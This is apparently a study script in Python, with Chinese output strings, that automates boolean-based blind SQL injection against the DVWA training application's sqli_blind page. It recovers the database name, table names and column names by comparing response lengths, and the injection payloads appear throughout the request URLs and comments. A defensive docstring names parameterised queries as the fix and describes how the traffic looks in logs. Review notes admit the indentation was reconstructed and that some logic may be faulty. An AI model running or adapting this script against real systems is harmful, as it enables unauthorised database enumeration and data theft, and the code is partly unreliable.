仅供学习代码参考
# python: DVWA boolean-based blind SQL injection automation script
"""Enumerate database name, table names and column names from DVWA's
``sqli_blind`` page by boolean-based blind injection.

Oracle used throughout: the length of the response body for an injected
``id`` value is compared with the length of the response for a plain
``id=1`` request (``rightLen``); an equal length is treated as "condition
true".  Every guess is one HTTP GET, so the run is long and extremely noisy
(each candidate URL is also printed to stdout).

NOTE(review): indentation below was reconstructed from a whitespace-mangled
paste; the loop nesting is inferred from the variable usage and should be
confirmed against the original file.

Defensive context: the page is exploitable because the ``id`` parameter is
concatenated into the SQL text; the fix on the application side is a
parameterised query (prepared statement) plus input typing of ``id``.  In
logs this activity shows up as a burst of requests to the same endpoint whose
``id`` value carries a quote and ``select``/``information_schema`` fragments,
differing only in one counter or character per request.
"""
import requests
import string
import time

# Base URL of the vulnerable endpoint; every request appends a value for ``id``.
INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id="
# Session cookies identifying the logged-in DVWA user (security level and PHPSESSID).
token={"security":"low","PHPSESSID":"p7g937ga5glcvg8m5hv9o9a2ht"} #login identity
# Upper bound on the number of columns guessed per table.
COLUMN_NUM=11
# Upper bound on the number of characters guessed per table/column name.
COLUMN_LEN=15
dbLen=0
dbname=''
table_num=0
table=[]
table_name='' #temporary buffer
column=[]
column_name=''#temporary buffer
rightLen=0

time_start=time.time()
# Baseline: response length for an un-injected ``id=1`` request.
url=INIT_URL+"1&Submit=Submit#"
rightLen=len(requests.get(url=url,cookies=token).text)
print("正常返回文本长度:"+str(rightLen))
#1. Guess the database name length. poc:" 1'and (select length(database()))="+str(dbLen)#"
# Counts up from 1 until the response length matches the baseline.
# NOTE(review): there is no upper bound on this loop; if the oracle never
# matches (e.g. session expired, so every page looks the same or different)
# it runs forever.
while True:
    dbLen +=1
    dbUrl=INIT_URL+"1'and (select length(database()))="+str(dbLen)+"%23&Submit=Submit#"
    print(dbUrl)
    if len(requests.get(url=dbUrl,cookies=token).text)==rightLen:
        print("数据库长度:"+str(dbLen))
        break
#2. Guess the database name. poc:" 1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1#"
# Only lowercase ASCII letters are tried per position; a position whose
# character is outside that set is silently skipped (dbname comes out short).
for i in range(1,dbLen+1):
    for j in string.ascii_lowercase:
        dbnameUrl=INIT_URL+"1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1%23&Submit=Submit#"
        print(dbnameUrl)
        if len(requests.get(url=dbnameUrl,cookies=token).text)==rightLen:
            dbname+=j
            break

print("数据库名字:"+dbname)

#3. Guess the number of tables. poc:" 1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)#"
# Tries 0..99; if no count matches, table_num stays 0 and steps 4/5 do nothing.
for i in range(100):
    dbUrl=INIT_URL+"1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)+"%23&Submit=Submit#"
    print(dbUrl)
    if len(requests.get(dbUrl,cookies=token).text)==rightLen:
        print("表数量"+str(i))
        table_num=i
        break

#4. Guess table names. poc:" 1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1)))=103#
# For each table index i and character position k, tries ASCII codes 48..122
# ('0'..'z'); the first code whose response length matches is appended.
# NOTE(review): k starts at 0, so position 0 is also queried; presumably that
# round never matches and only costs extra requests -- verify.
for i in range(table_num):
    for k in range(COLUMN_LEN):
        for j in range(48,123):
            dbUrl=INIT_URL+"1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
            print(dbUrl)
            if len(requests.get(dbUrl,cookies=token).text)==rightLen:
                table_name+=chr(j)
                print(table_name)
                break
    table.append(table_name)
    table_name=''
print("表名:"+str(table))


#5. Guess column names. poc :" 1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1)))=i
# Same character-by-character scheme as step 4, one entry per table; the
# column names of a table are joined into a single string with '/' after
# each name (including a trailing '/').


for m in range(table_num):
    for i in range(COLUMN_NUM):
        for k in range(COLUMN_LEN):
            for j in range(48,123):
                dbUrl=INIT_URL+"1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"'and table_name='"+table[m]+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
                print(dbUrl)
                if len(requests.get(dbUrl,cookies=token).text)==rightLen:
                    column_name+=chr(j)
                    print(column_name)
                    break
        column_name+='/'
    column.append(column_name)
    column_name=''
print("列名:"+str(column))

# Summary of everything recovered, plus elapsed wall-clock time.
time_end=time.time()
print('用时:',time_end-time_start,'s')
print("正常返回文本长度:"+str(rightLen))
print("数据库长度:"+str(dbLen))
print("数据库名字:"+dbname)
# NOTE(review): ``i`` here is whatever the last loop left in it (the column
# index from step 5, or the table-count candidate if step 5 did not run),
# not necessarily the table count; ``table_num`` holds the value actually found.
print("表数量"+str(i))
print("表名:"+str(table))
print("列名:"+str(column))
#6. Dumping row data (not implemented here). poc: 1'and (select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i
#Guess specific columns individually; guessing everything takes too long.